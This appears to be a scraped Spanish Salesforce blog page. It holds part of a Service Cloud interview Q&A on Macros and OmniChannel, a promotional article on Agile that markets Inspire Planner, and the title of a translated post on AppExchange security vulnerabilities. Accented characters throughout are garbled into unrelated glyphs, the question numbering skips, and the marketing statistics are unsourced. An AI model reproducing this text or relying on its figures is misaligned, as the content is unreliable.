Las macros y los flujos tienen diferentes prop贸sitos. Mientras que las Macros automatizan las acciones del usuario, los Flujos automatizan los procesos en el backend.

12. 驴C贸mo funciona el manejo de errores con Macros?

Si una macro encuentra un problema durante la ejecuci贸n, se detiene y se muestra un mensaje de error.

13. 驴Pueden los usuarios sin privilegios de administrador crear o modificar macros?

Los usuarios pueden crear macros personales, pero crear o modificar macros compartidas normalmente requiere ciertos permisos o privilegios de administrador.

14. 驴Existe alguna forma de realizar un seguimiento de los cambios realizados por una Macro?

No existe un mecanismo de seguimiento directo para las macros, pero puede utilizar las funciones de seguimiento de auditor铆a est谩ndar de Salesforce para ver los cambios en los registros.

15. 驴Cu谩l es el papel de las instrucciones macro en el proceso de creaci贸n?

Las instrucciones macro son el coraz贸n de la macro y dictan qu茅 acciones realiza. Elaborarlos es como escribir una lista detallada de tareas pendientes para otra persona; es necesario especificar cada paso de forma clara y en orden.

29. 驴Puedes usar macros para enviar correos electr贸nicos con archivos adjuntos?

No, las macros pueden automatizar el proceso de env铆o de un correo electr贸nico, pero no pueden agregar archivos adjuntos.

Omnicanal

1. 驴Puedes explicar qu茅 es OmniCanal en Salesforce?

Conozca todo sobre: OmniCanal en Salesforce

OmniCanal es una caracter铆stica de Salesforce que permite la gesti贸n de elementos de trabajo entrantes desde diferentes canales de comunicaci贸n. Se trata de dirigir el trabajo adecuado a los agentes adecuados en el momento adecuado, en funci贸n de su disponibilidad y capacidad, garantizando que las cargas de trabajo se gestionen de manera eficiente.

2: 驴C贸mo beneficia OmniCanal a un equipo de servicio al cliente?

OmniChannel ayuda a los equipos de servicio al cliente al distribuir el trabajo de manera uniforme entre los agentes, reducir los tiempos de espera de los clientes y permitir que los agentes manejen el trabajo desde varios canales dentro de una sola plataforma. Este enfoque simplificado conduce a un mejor servicio al cliente y una mayor productividad de los agentes.

3. 驴Cu谩l es la diferencia entre OmniCanal y distribuci贸n del trabajo tradicional?

La distribuci贸n tradicional del trabajo a menudo implica una asignaci贸n manual, lo que puede llevar mucho tiempo y ser ineficiente. OmniChannel, por otro lado, dirige autom谩ticamente el trabajo a los agentes m谩s adecuados seg煤n criterios preestablecidos y la disponibilidad de los agentes en tiempo real, lo que hace que el proceso sea m谩s r谩pido y eficiente.

4. 驴Puede explicar el 鈥淓stado de presencia鈥 en OmniCanal?

鈥淓stado de presencia鈥 se refiere a la disponibilidad actual de un agente para recibir trabajo. Los agentes pueden configurar su estado para mostrar si est谩n disponibles, ocupados o ausentes, y OmniCanal utiliza esta informaci贸n para enrutarles el trabajo en consecuencia.

5. 驴C贸mo garantiza OmniCanal que los casos de alta prioridad se manejen r谩pidamente?

OmniCanal permite a los administradores establecer niveles de prioridad para diferentes tipos de trabajo. Cuando llegan elementos de trabajo, se enrutan autom谩ticamente seg煤n estos niveles de prioridad. Los elementos de alta prioridad se env铆an al principio de la cola para que se atiendan m谩s r谩pido.

6. 驴Se puede integrar OmniCanal con otras funciones de Salesforce?

S铆, OmniCanal se integra perfectamente con otras funciones de Salesforce. Por ejemplo, funciona con Service Cloud para gestionar procesos de atenci贸n al cliente, Sales Cloud para procesos de ventas e incluso aplicaciones personalizadas de Salesforce.

7. 驴C贸mo admite OmniCanal los diferentes canales de comunicaci贸n?

OmniCanal es vers谩til al admitir varios canales de comunicaci贸n como correo electr贸nico, chat, SMS y redes sociales. Dirige todos estos diferentes tipos de trabajo a los agentes a trav茅s de la misma plataforma, garantizando un enfoque unificado del servicio al cliente.

8. 驴Puede describir un escenario en el que el enrutamiento omnicanal podr铆a resultar beneficioso?

Imagine un escenario en el que hay un gran volumen de solicitudes de servicio entrantes y una cantidad limitada de agentes disponibles. OmniCanal dirige eficientemente las solicitudes a los agentes disponibles seg煤n sus habilidades, carga de trabajo y prioridad de los casos, garantizando una carga de trabajo equilibrada y respuestas oportunas.

9. 驴Cu谩les son los tipos de Omni Channel?

Basado en cola 鈫 Asignar agentes a la cola

Basado en habilidades 鈫 Asignar habilidades a los agentes

Enrutamiento externo 鈫 Configuraci贸n de enrutamiento de terceros

10. 驴C贸mo configurar Omni Channel?

  1. Habilite OmniCanal.
  2. Crear canales de atenci贸n.
  3. Cree configuraciones de enrutamiento.
  4. Asociar configuraciones de enrutamiento y agentes con colas.
  5. Crear configuraciones de presencia.
  6. Crear estados de presencia.
  7. Agregue el widget omnicanal.

11. 驴C贸mo crear un Canal de Atenci贸n?

Se puede crear un canal de servicio para cualquier objeto de Salesforce, como un caso, cliente potencial, sesi贸n SOS o objeto personalizado.

12. 驴C贸mo crear una configuraci贸n de enrutamiento?

Las configuraciones de enrutamiento determinan c贸mo se enrutan los elementos de trabajo a los agentes.

Util铆celos para priorizar la importancia relativa y el tama帽o de los elementos de trabajo de sus colas.

13. 驴Explicar los ajustes de configuraci贸n de enrutamiento?

Prioridad de ruta:

El orden en el que los elementos de trabajo de la cola asociados con esta configuraci贸n de enrutamiento se enrutan a los agentes. Los objetos en colas con un n煤mero menor se enrutan primero a los agentes.

Modelo de enrutamiento:

Determina c贸mo se enrutan los elementos de trabajo entrantes a los agentes asignados al canal de servicio de configuraci贸n.

Tiempo de espera de empuje (segundos):

Establece un l铆mite de tiempo para que un agente responda a un elemento antes de enviarlo a otro agente.

Unidades de Capacidad:

Cantidad de capacidad total del agente.

Preguntas basadas en escenarios

1. 驴C贸mo dise帽ar铆a una soluci贸n para respaldar a un equipo de soporte multiling眉e que utiliza Service Cloud?

Service Cloud de Salesforce admite equipos multiling眉es mediante el uso de funciones como Translation Workbench, que le permite traducir objetos est谩ndar y personalizados, reglas de validaci贸n, etiquetas de campo y m谩s, a cualquiera de los idiomas admitidos.

Adem谩s, los art铆culos de conocimiento se pueden escribir y traducir a varios idiomas, lo que permite a los agentes de soporte acceder y proporcionar informaci贸n en varios idiomas.

Tambi茅n puede configurar OmniCanal para enrutar casos a los agentes adecuados seg煤n sus habilidades ling眉铆sticas. De esta manera, los clientes pueden interactuar con el soporte en su idioma preferido, mejorando la satisfacci贸n del cliente.

2. 驴Puede explicarme el proceso de dise帽o de una soluci贸n de Service Cloud que incorpore reglas de escalamiento de casos y SLA para garantizar una resoluci贸n oportuna del caso?

  1. Es necesario definir los SLA, es decir, el tiempo dentro del cual se deben resolver casos de ciertos tipos o prioridades.
  2. Una vez definidos, configurar谩 los procesos de derechos para especificar el cronograma para cada etapa de resoluci贸n del caso.
  3. Luego, usar铆a Milestones dentro de estos procesos para rastrear si los casos se est谩n resolviendo dentro de los SLA definidos.
  4. Las reglas de escalamiento de casos se usar铆an para escalar casos que est茅n en peligro de violar sus SLA. Estos se pueden configurar para escalar seg煤n la antig眉edad del caso, la prioridad o incluso si el caso ha estado inactivo. Los casos escalados pueden luego remitirse autom谩ticamente a agentes o supervisores con m谩s experiencia para recibir atenci贸n urgente.

3. 驴C贸mo abordar铆a el dise帽o de una soluci贸n para un centro de llamadas a gran escala que necesita gestionar grandes vol煤menes de casos y llamadas?

鈥 Para los centros de llamadas de gran volumen, le conviene aprovechar la funci贸n OmniCanal de Service Cloud, que garantiza que los casos se dirijan a los agentes adecuados seg煤n su disponibilidad y conjunto de habilidades, lo que ayuda a gestionar la carga de trabajo de manera eficiente. La integraci贸n de la telefon铆a mediante Open CTI permite a los agentes recibir y realizar llamadas directamente dentro de Salesforce, garantizando que tengan toda la informaci贸n relevante del cliente al alcance de su mano.

4. 驴Cu谩l es su experiencia con la integraci贸n de aplicaciones de terceros en Service Cloud y c贸mo ha abordado la soluci贸n de problemas de integraci贸n en el pasado?

Mi enfoque implica primero garantizar que la aplicaci贸n de terceros tenga una documentaci贸n API s贸lida y cumpla con las mejores pr谩cticas de seguridad y cumplimiento. Salesforce ofrece varias formas de integraci贸n, como mediante API REST o SOAP, servicios externos o incluso mediante aplicaciones AppExchange, si est谩n disponibles.

5. 驴C贸mo dise帽ar铆a una soluci贸n que utilice Service Cloud para rastrear la opini贸n del cliente e incorporar esa informaci贸n en los flujos de trabajo de gesti贸n de casos?

Service Cloud puede integrarse con herramientas que ofrecen an谩lisis de sentimientos, incluido Einstein Sentiment de Salesforce. Al analizar el texto de las interacciones con los clientes (correos electr贸nicos, transcripciones de chat, publicaciones en redes sociales), se puede determinar el sentimiento (positivo, neutral, negativo). Estos datos de opini贸n se pueden almacenar como un campo en el objeto Caso o en un objeto personalizado relacionado.

6. 驴Puede dar un ejemplo de c贸mo ha utilizado Service Cloud para mejorar las capacidades de autoservicio del cliente y reducir la cantidad de solicitudes de soporte entrantes?

Una estrategia eficaz es implementar una comunidad o portal de clientes utilizando Salesforce Community Cloud, integrado con Service Cloud. Aqu铆 se puede acceder a los art铆culos de la base de conocimientos, lo que permite a los clientes encontrar respuestas a sus preguntas. Tambi茅n se pueden crear casos directamente desde la comunidad y los clientes pueden verificar su estado sin necesidad de comunicarse con el soporte. La implementaci贸n de un chatbot a trav茅s de Einstein Bots tambi茅n puede desviar consultas rutinarias al proporcionar respuestas autom谩ticas a preguntas comunes.

7. 驴Has trabajado con Service Cloud Voice? 驴C贸mo ha utilizado esta tecnolog铆a para mejorar el rendimiento del call center y la satisfacci贸n del cliente?

Service Cloud Voice integra la telefon铆a en Salesforce, brindando una vista unificada del cliente y transcripci贸n de llamadas en tiempo real. Esto permite a los agentes centrarse m谩s en el cliente que en tomar notas. La transcripci贸n en tiempo real, impulsada por Einstein, tambi茅n puede proporcionar sugerencias para el siguiente paso, ayudando a los agentes m谩s nuevos. La conclusi贸n posterior a la llamada se acelera porque los datos de la llamada ya est谩n en Salesforce, lo que reduce el trabajo posterior a la llamada y, en consecuencia, los tiempos de espera para los clientes. Los datos hist贸ricos de llamadas brindan informaci贸n valiosa para el an谩lisis de la opini贸n del cliente y el desempe帽o de los agentes, lo que impacta positivamente la capacitaci贸n y la satisfacci贸n del cliente.

8. 驴C贸mo abordar铆a el dise帽o de una soluci贸n para una empresa que opera en varios pa铆ses con diferentes regulaciones de privacidad de datos?

鈥 El cumplimiento de diversas normas de privacidad de datos se puede gestionar en Service Cloud mediante el uso de funciones como opciones de residencia de datos para almacenar datos en regiones espec铆ficas, enmascaramiento de datos, cifrado, seguridad a nivel de campo y reglas de acceso a registros para controlar qui茅n puede acceder a qu茅 datos.

9. 驴C贸mo ha abordado los problemas de escalabilidad y rendimiento al dise帽ar soluciones de Service Cloud para grandes empresas?

  • Para las grandes empresas, las consideraciones incluyen la gesti贸n del volumen de datos, el uso de las herramientas de optimizaci贸n del rendimiento integradas de Salesforce y la revisi贸n peri贸dica de la organizaci贸n para eliminar configuraciones y personalizaciones obsoletas.
  • Tambi茅n es importante dise帽ar con una mentalidad de 鈥渃lics, no c贸digo鈥 para minimizar el c贸digo personalizado, que puede introducir complejidad y sobrecarga de rendimiento.
  • Cuando es necesario un c贸digo personalizado, es vital seguir las mejores pr谩cticas para la masificaci贸n y las consultas SOQL eficientes. Finalmente, el monitoreo a trav茅s del Optimizador, Health Check y otras herramientas de Salesforce puede ayudar a identificar y mitigar problemas de rendimiento de manera proactiva.

10. 驴C贸mo ha utilizado Service Cloud para mejorar la retenci贸n de clientes y reducir las tasas de abandono?

En Service Cloud, la retenci贸n de clientes se puede mejorar significativamente utilizando las s贸lidas funciones de servicio al cliente de la plataforma. Por ejemplo, aprovecho las capacidades de an谩lisis e informes de Service Cloud para realizar un seguimiento de las puntuaciones de satisfacci贸n del cliente e identificar problemas comunes que provocan la insatisfacci贸n del cliente. Al integrar los comentarios directamente en el sistema de gesti贸n de casos, los agentes pueden abordar las inquietudes de manera proactiva antes de que se intensifiquen, lo que impacta directamente en la satisfacci贸n y retenci贸n del cliente. Adem谩s, caracter铆sticas como la comunicaci贸n personalizada con el cliente, art铆culos de conocimiento para el autoservicio y la resoluci贸n eficiente de casos a trav茅s del enrutamiento y escalamiento automatizados de casos ayudan a mantener una experiencia positiva para el cliente, reduciendo as铆 la deserci贸n.

11. 驴Ha trabajado con la funcionalidad Live Agent de Service Cloud? 驴C贸mo ha utilizado esta tecnolog铆a para mejorar las experiencias de atenci贸n al cliente?

S铆, utilic茅 Live Agent dentro de Service Cloud para mejorar el soporte que reciben los clientes en tiempo real. Al integrar Live Agent, los clientes pueden chatear instant谩neamente con agentes de soporte, lo que reduce los tiempos de espera y mejora la satisfacci贸n general. Descubr铆 que incorporar el chat de Live Agent en sitios web y aplicaciones m贸viles donde los clientes son m谩s activos reduce significativamente la barrera para acceder al soporte.

12. 驴Puede describir c贸mo dise帽ar铆a una soluci贸n de Service Cloud que incorpore el enrutamiento automatizado de casos al agente apropiado seg煤n el problema del cliente y el conjunto de habilidades del agente?

Para lograr esto, aprovechar铆amos la funci贸n OmniCanal, que permite enrutar los casos seg煤n el conjunto de habilidades, la disponibilidad y la carga de trabajo del agente.

  1. Comenzar铆a por definir varios conjuntos de habilidades de agentes dentro del sistema y asociar铆a estas habilidades con los agentes correspondientes.
  2. Luego, establec铆a configuraciones de enrutamiento, donde los casos entrantes se eval煤an seg煤n criterios predefinidos relacionados con el problema del cliente y luego se los relaciona con un agente que posee el conjunto de habilidades requerido.

13. 驴C贸mo abordar铆a el dise帽o de una soluci贸n de Service Cloud que pueda manejar grandes vol煤menes de casos manteniendo tiempos de respuesta consistentes y niveles de satisfacci贸n del cliente?

  • Primero, implementar铆a reglas de asignaci贸n de casos para automatizar la distribuci贸n de casos a los agentes o colas correctos.
  • Luego, utilizar铆a la funci贸n de reglas de escalamiento de casos de Service Cloud para priorizar casos urgentes o de alto impacto.
  • Para mantener tiempos de respuesta constantes, se pueden utilizar funciones como reglas de respuesta autom谩tica para reconocer inmediatamente los env铆os de casos.
  • Adem谩s, integrar铆a una base de conocimientos integral para facilitar las opciones de autoservicio, reduciendo as铆 la carga de casos para los agentes.

50% Me gusta VS
50% No me gusta

Seguir leyendo

Uso de Agile en proyectos de Salesforce – Inspire Planner

Uso de Agile en proyectos de Salesforce - Inspire Planner

Los enfoques tradicionales de gesti贸n de proyectos a menudo necesitan ayuda con la naturaleza vibrante de las implementaciones de Salesforce. Estos enfoques convencionales, aunque estructurados, pueden provocar falta de comunicaci贸n, incumplimiento de plazos y aumento de costos debido a su inflexibilidad. Afortunadamente, puedes utilizar Agile en proyectos de Salesforce para mejorar el proceso de entrega de tu proyecto.

Los proyectos de CRM pueden ser extremadamente complejos y tienen una tasa de fracaso significativa. Seg煤n diferentes fuentes que investigan proyectos de CRM, entre el 20 y el 70% de dichos proyectos fracasan. La falta de coordinaci贸n interfuncional se cit贸 a menudo como el factor de riesgo m谩s importante para el fracaso del proyecto CRM. Imagine la frustraci贸n de invertir tiempo y recursos en un proyecto de Salesforce s贸lo para verlo descarrilado por estrategias de gesti贸n inflexibles.

La metodolog铆a Agile ofrece una salida. En comparaci贸n, s贸lo el 9% de los proyectos 谩giles terminan en fracaso. Dise帽ado para la adaptabilidad y la colaboraci贸n, Agile en los proyectos de Salesforce los mantiene alineados con los objetivos comerciales a trav茅s del enfoque iterativo.

En este art铆culo, descubrir谩 c贸mo Agile en los proyectos de Salesforce garantiza que se mantengan encaminados, que las partes interesadas participen continuamente y que el resultado resuene con los objetivos previstos.

Metodolog铆a de gesti贸n de proyectos en cascada versus 谩gil: descripci贸n general r谩pida

Waterfall es una metodolog铆a tradicional de gesti贸n de proyectos que sigue un enfoque lineal y secuencial. Los proyectos que utilizan la metodolog铆a Waterfall avanzan a trav茅s de fases predefinidas, desde la recopilaci贸n de requisitos hasta la implementaci贸n del producto, y normalmente utilizan el diagrama de Gantt para mostrar el cronograma y el progreso de los proyectos.

Gesti贸n de proyectos en cascada de Inspire Planner en SalesforceGesti贸n de proyectos en cascada de Inspire Planner en Salesforce

Por el contrario, la metodolog铆a Agile es un enfoque colaborativo para la gesti贸n de proyectos y el desarrollo de software que enfatiza la flexibilidad, los comentarios de los clientes y la iteraci贸n r谩pida. En lugar de una progresi贸n lineal, los proyectos se dividen en tareas peque帽as y manejables llamadas "sprints" o "iteraciones", que son per铆odos cortos con un l铆mite de tiempo.

Inspire Planner Gesti贸n 谩gil de proyectos en SalesforceInspire Planner Gesti贸n 谩gil de proyectos en Salesforce

Si diferentes equipos de su organizaci贸n utilizan ambos enfoques para diferentes proyectos, existen herramientas nativas de Salesforce como Inspire Planner que pueden manejar con 茅xito ambas metodolog铆as, Waterfall y Agile.

Beneficios de utilizar Agile en proyectos de Salesforce

Los proyectos de Salesforce son complejos y requieren un enfoque flexible e iterativo para tener 茅xito. La metodolog铆a 谩gil es muy adecuada para este tipo de proyectos y ofrece varios beneficios que pueden ayudar a agilizar el proceso.

  • Velocidad: Con Agile en Salesforce, los proyectos se dividen en fases cortas de sprint, cada una de las cuales da como resultado un resultado tangible o una parte del producto final. Este enfoque modular acelera el proceso de desarrollo, garantizando una entrega m谩s r谩pida que los m茅todos tradicionales, donde todo el proyecto se aborda como una tarea enorme. Alrededor del 6,2% opta por sprints de una semana, manteniendo sus ciclos cortos y din谩micos, mientras que la mayor铆a de los equipos (59,1%) prefiere sprints de 2 semanas.
  • Flexibilidad: Agile permite a los equipos incorporar estos cambios sin problemas en el proyecto en curso a medida que evolucionan las necesidades de los procesos de negocio o surgen nuevos requisitos. Esto garantiza que el producto final siempre se alinee con los objetivos comerciales actuales y las necesidades de los usuarios. La flexibilidad de Agile lo hace un 37% m谩s r谩pido y un 16% m谩s productivo que el modelo de desarrollo de proyectos convencional.
  • Participaci贸n del cliente: Agile enfatiza la colaboraci贸n y la comunicaci贸n abierta. Los clientes o partes interesadas participan durante todo el proceso de desarrollo y brindan retroalimentaci贸n peri贸dica despu茅s de cada sprint. Esta participaci贸n continua garantiza que el producto se desarrolle seg煤n sus expectativas, lo que reduce las posibilidades de sorpresas de 煤ltimo momento o revisiones importantes. Se pueden realizar cambios inmediatamente si hay obst谩culos o defectos en el camino, lo que convierte a Agile en un modelo ideal para muchos equipos de diversas industrias.
  • Calendario y costos predecibles: la naturaleza de Agile, combinada con su 茅nfasis en la planificaci贸n y las revisiones peri贸dicas, facilita la estimaci贸n de cronogramas y presupuestos. Cada sprint tiene una duraci贸n y un alcance definidos, lo que permite a los equipos predecir mejor los costos del proyecto y las fechas de entrega. Los sprints suelen durar entre una y cuatro semanas, lo que permite a los equipos ofrecer nuevas funciones r谩pidamente y con una fuente de alta previsibilidad.

C贸mo Agile en Salesforce mejora la gesti贸n de proyectos

El verdadero potencial de Salesforce s贸lo puede desbloquearse si se combina con un enfoque de gesti贸n de proyectos adaptativo. As铆 es como Agile amplifica la eficacia de la entrega de proyectos de Salesforce:

  • Desarrollo iterativo y retroalimentaci贸n: Agile lo coloca a la vanguardia, a diferencia de los modelos tradicionales, donde la retroalimentaci贸n suele ser una ocurrencia tard铆a. Agile en Salesforce permite adaptaciones r谩pidas basadas en los comentarios de las partes interesadas al dividir el proyecto en sprints m谩s peque帽os y manejables. Seg煤n una encuesta del Project Management Institute, el 71% de las empresas adoptan Agile, lo que destaca su amplia aceptaci贸n y eficacia.
  • Colaboraci贸n y comunicaci贸n: Agile no es solo una metodolog铆a; es una cultura. Mejora un entorno de comunicaci贸n abierta, garantizando que todos los miembros del equipo, desde los desarrolladores hasta las partes interesadas, est茅n en sinton铆a. Esta colaboraci贸n mejorada garantiza que la implementaci贸n de Salesforce sea integral y atienda todas las facetas del negocio. Desarrollar una cultura 谩gil s贸lida en su organizaci贸n puede aumentar el rendimiento comercial en un 237 %.
  • Transparencia: una de las caracter铆sticas destacadas de Agile es su 茅nfasis en la visibilidad. Herramientas como los tableros Kanban y los gr谩ficos de evoluci贸n ofrecen a las partes interesadas una vista en tiempo real del progreso del proyecto. Esta transparencia garantiza la rendici贸n de cuentas y permite intervenciones oportunas si el proyecto se desv铆a de su curso. Agile en Salesforce puede mejorar la transparencia del proyecto en un 40%.
  • Gesti贸n de riesgos: los riesgos son inevitables en el ajetreado mundo de las implementaciones de Salesforce. Sin embargo, con su enfoque iterativo, Agile permite la identificaci贸n temprana de posibles obst谩culos. Al abordar los problemas de frente, Agile en Salesforce garantiza que los riesgos se identifiquen y mitiguen r谩pidamente. El 31% de las empresas ha adoptado Agile para reducir los riesgos.
  • Mejora continua: la complacencia no tiene cabida en Agile. Despu茅s de cada sprint, los equipos realizan retrospectivas, analizando qu茅 sali贸 bien y qu茅 no. Estos conocimientos allanan el camino para la optimizaci贸n de procesos, garantizando que el equipo evolucione y mejore. Seg煤n Hexacta, adoptar una mentalidad de mejora continua en el desarrollo 谩gil ayuda a mejorar la productividad del equipo y mejora la innovaci贸n.
Registro de riesgos del proyecto en Inspire Planner, una aplicaci贸n de gesti贸n de proyectos nativa de Salesforce

Implementaci贸n de Agile en proyectos de Salesforce

La integraci贸n de metodolog铆as 谩giles en proyectos de Salesforce puede cambiar las reglas del juego para las implementaciones de CRM. Aqu铆 hay una gu铆a de 4 pasos para incorporar Agile a la perfecci贸n en sus esfuerzos de Salesforce:

Configurar equipos para Agile en Salesforce

La base de cualquier proyecto Agile exitoso radica en su equipo. Para los proyectos de Salesforce, hay miembros responsables de tareas espec铆ficas.

  • Propietario del producto: el propietario del producto establece la visi贸n del proyecto, prioriza las tareas y alinea el equipo con los objetivos comerciales.
  • Scrum Master: Actuando como facilitador, el Scrum Master garantiza que se sigan los procesos 谩giles, aborda cualquier impedimento que el equipo pueda enfrentar y fomenta un entorno colaborativo.
  • Equipo de desarrollo: compuesto por desarrolladores, arquitectos y otros especialistas de Salesforce, este grupo es responsable de la implementaci贸n real, asegurando que cada sprint entregue resultados tangibles.

Herramientas y plataformas

Los usuarios de Salesforce pueden encontrar varias herramientas nativas de gesti贸n de proyectos para ayudar en la implementaci贸n 谩gil. Herramientas como Inspire Planner pueden ser invaluables, ya que ofrecen funciones que se alinean con los principios 谩giles, como:

  • Reserva
  • tableros kanban
  • Planificaci贸n de sprints
  • Seguimiento del tiempo
  • Administracion de recursos
  • Informes 谩giles y paneles de control

Inspire Planner es una aplicaci贸n de gesti贸n de proyectos 100 % nativa de Salesforce que es totalmente compatible con Agile en Salesforce desde el primer momento y cuenta con una alta calificaci贸n de sus clientes con m谩s de 140 rese帽as de 5 estrellas en AppExchange. Con esta herramienta, puede gestionar f谩cilmente los trabajos pendientes de productos, planificar sprints, realizar un seguimiento de los puntos de la historia, visualizar el trabajo mediante tableros Kanban, gestionar recursos y analizar el progreso con gr谩ficos de evoluci贸n.

Dado que Inspire Planner se encuentra dentro de su organizaci贸n de Salesforce, puede vincular directamente sus historias de usuario o tareas a cualquier registro de Salesforce, como Oportunidades, Casos y Cuentas, incluidos registros de sus objetos personalizados.

Adem谩s, Inspire Planner tambi茅n ofrece una funcionalidad avanzada pero intuitiva de gesti贸n de proyectos en cascada. Al combinar las metodolog铆as Waterfall y Agile en un solo paquete con un solo costo de suscripci贸n, Inspire Planner es la aplicaci贸n para todas sus necesidades de gesti贸n de proyectos en Salesforce.

Tablero Kanban en Inspire Planner, una herramienta de gesti贸n de proyectos nativa de SalesforceTablero Kanban en Inspire Planner, una herramienta de gesti贸n de proyectos nativa de Salesforce

Planificaci贸n de Sprint, reuniones diarias y revisiones de Sprint

En el contexto de Salesforce, estas ceremonias Agile son importantes para su proceso de gesti贸n de proyectos:

  • Planificaci贸n de Sprint: Dadas las vastas capacidades de Salesforce, definir objetivos claros para cada sprint es crucial, asegurando que los esfuerzos del equipo se dirijan hacia tareas de alta prioridad.
  • Reuniones diarias: estas breves reuniones permiten al equipo analizar el progreso, abordar los obst谩culos y garantizar que la implementaci贸n de Salesforce siga por buen camino.
  • Revisiones de Sprint: despu茅s de cada sprint, es esencial revisar el trabajo realizado, recopilar comentarios y garantizar que las funcionalidades implementadas de Salesforce se alineen con las necesidades comerciales.

Ceremonias de adaptaci贸n a los desaf铆os relacionados con Agile en Salesforce

Cada plataforma tiene desaf铆os 煤nicos y Salesforce no es una excepci贸n. Las ceremonias 谩giles pueden necesitar ligeras adaptaciones. Puede estar relacionado con personalizaciones espec铆ficas de Salesforce, integraciones con aplicaciones no nativas o la gesti贸n de los ciclos de lanzamiento regulares de Salesforce.

Por ejemplo, la duraci贸n de los sprints puede variar seg煤n los ciclos de lanzamiento de Salesforce, o las retrospectivas pueden incluir discusiones sobre herramientas y mejores pr谩cticas espec铆ficas de Salesforce.

Mejores pr谩cticas para introducir Agile en Salesforce

Fusionar el mundo de las metodolog铆as 谩giles con las implementaciones de Salesforce puede desbloquear eficiencias y resultados incomparables. Sin embargo, se deben arraigar ciertas mejores pr谩cticas para aprovechar plenamente el potencial de esta sinergia.

Estas son algunas de las mejores pr谩cticas que puede probar:

Capacitaci贸n y mejora de equipos en pr谩cticas 谩giles

Antes de sumergirse en las aguas de Agile, es imprescindible que el equipo est茅 bien equipado para nadar. Esto significa invertir en sesiones de capacitaci贸n integrales que presenten a los miembros del equipo los principios b谩sicos de Agile.

Ya sea que se trate de comprender la importancia de los sprints, el papel de un Scrum Master o los matices de las retrospectivas, un equipo bien capacitado puede afrontar f谩cilmente los desaf铆os de las implementaciones de Salesforce. Adem谩s, las sesiones peri贸dicas de mejora de habilidades pueden garantizar que el equipo se mantenga actualizado con las 煤ltimas metodolog铆as 谩giles y aplicaciones 谩giles para Salesforce.

Garantizar canales de comunicaci贸n claros entre los expertos de Salesforce y los profesionales 谩giles

La comunicaci贸n clara es el puente que conecta los mundos Agile y Salesforce. Con su profundo conocimiento de la plataforma, los expertos de Salesforce deben dialogar constantemente con profesionales 谩giles que aportan experiencia en metodolog铆a.

Esto garantiza que los procesos 谩giles se adapten a las demandas 煤nicas de Salesforce. Las reuniones peri贸dicas, las sesiones frecuentes de retroalimentaci贸n y los canales de comunicaci贸n abiertos pueden evitar desajustes y garantizar que el proyecto siga encaminado.

Revisar y adaptar peri贸dicamente el proceso 谩gil para adaptarlo al entorno de Salesforce

A medida que avanzan los proyectos de Salesforce, es fundamental revisar y perfeccionar los procesos 谩giles continuamente. Esto podr铆a significar ajustar la duraci贸n de los sprints para alinearse con los ciclos de lanzamiento de Salesforce, incorporar herramientas espec铆ficas de Salesforce en el conjunto de herramientas Agile o incluso ajustar la estructura del equipo para adaptarse mejor a las demandas del proyecto.

Las retrospectivas peri贸dicas pueden ofrecer informaci贸n sobre 谩reas de mejora, garantizando que el proceso Agile permanezca optimizado para el entorno de Salesforce.

Posibles desaf铆os de Agile en Salesforce y Soluciones

Combinar metodolog铆as 谩giles con implementaciones de Salesforce, si bien es prometedor, es un desaf铆o. Sin embargo, estos desaf铆os pueden abordarse eficazmente con previsi贸n y planificaci贸n estrat茅gica.

脡stos son algunos de los posibles obst谩culos y c贸mo superarlos:

Resistencia al cambio de las metodolog铆as tradicionales

  • Desaf铆o: Los equipos acostumbrados a las metodolog铆as tradicionales de gesti贸n de proyectos pueden encontrar desalentador el cambio a Agile. El miedo a lo desconocido y la comodidad de los procesos familiares pueden generar resistencia.
  • Soluci贸n: La gesti贸n del cambio es clave. Comience con sesiones de concientizaci贸n que destaquen los beneficios de Agile, especialmente en el contexto de las implementaciones de Salesforce. Los talleres pr谩cticos, las historias de 茅xito y los proyectos piloto pueden ayudar a los equipos a realizar una transici贸n sin problemas. Tener defensores del cambio dentro del equipo puede generar un sentimiento positivo y fomentar la adopci贸n.

Alinear sprints 谩giles con los ciclos de lanzamiento de Salesforce

  • Desaf铆o: los ciclos de lanzamiento de Salesforce a veces pueden alinearse con los sprints 谩giles. Esto puede provocar problemas de sincronizaci贸n, donde es posible que se publiquen nuevas funciones de Salesforce a mitad del sprint.
  • Soluci贸n: La planificaci贸n estrat茅gica es esencial. Los equipos deben conocer el calendario de lanzamientos de Salesforce y planificar sus sprints en consecuencia. Si se anticipa un lanzamiento de Salesforce durante un sprint, se deben tomar medidas para acomodarlo. Esto podr铆a significar sprints m谩s cortos o alinear sprints espec铆ficos en torno a versiones de Salesforce para explorar e integrar nuevas funciones.

Garantizar la calidad en los ciclos r谩pidos de desarrollo

  • Desaf铆o: La naturaleza iterativa de Agile significa ciclos de desarrollo r谩pidos. Si bien esto garantiza una entrega m谩s r谩pida, a veces puede comprometer la calidad, especialmente cuando se intenta aprovechar las amplias capacidades de Salesforce.
  • Soluci贸n: el control de calidad debe integrarse en cada sprint. Las herramientas de prueba automatizadas, la integraci贸n continua y las revisiones peri贸dicas del c贸digo pueden garantizar que la calidad no se vea comprometida. Adem谩s, dedicar sprints espec铆ficos o partes de sprints a controles de calidad, especialmente despu茅s de importantes personalizaciones de Salesforce, puede garantizar un producto final s贸lido.

Pensamientos finales

La fusi贸n de metodolog铆as 谩giles con la entrega de proyectos de Salesforce presagia una nueva era en las implementaciones de CRM. Esta sinergia promete tanto eficiencia como un nivel de adaptabilidad y capacidad de respuesta del que a menudo carecen las metodolog铆as tradicionales.

Vemos un testimonio de este potencial transformador cuando reflexionamos sobre herramientas como Inspire Planner.

  • Encapsula la esencia de Agile dentro del ecosistema de Salesforce.
  • Garantiza que los proyectos se completen y realmente resuenen con los objetivos comerciales.

Adoptar Agile para las implementaciones de Salesforce no es solo una recomendaci贸n sino un imperativo estrat茅gico. A medida que la industria contin煤a evolucionando, la capacidad de adaptarse e iterar r谩pidamente definir谩 el 茅xito.

Al integrar Agile en los proyectos de Salesforce, las organizaciones pueden asegurarse de seguir el ritmo de esta evoluci贸n y mejorar la colaboraci贸n. El futuro llama y es 谩gil.

Seguir leyendo

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Las 20 principales vulnerabilidades encontradas en la revisi贸n de seguridad de AppExchange | Blog de desarrolladores de Salesforce

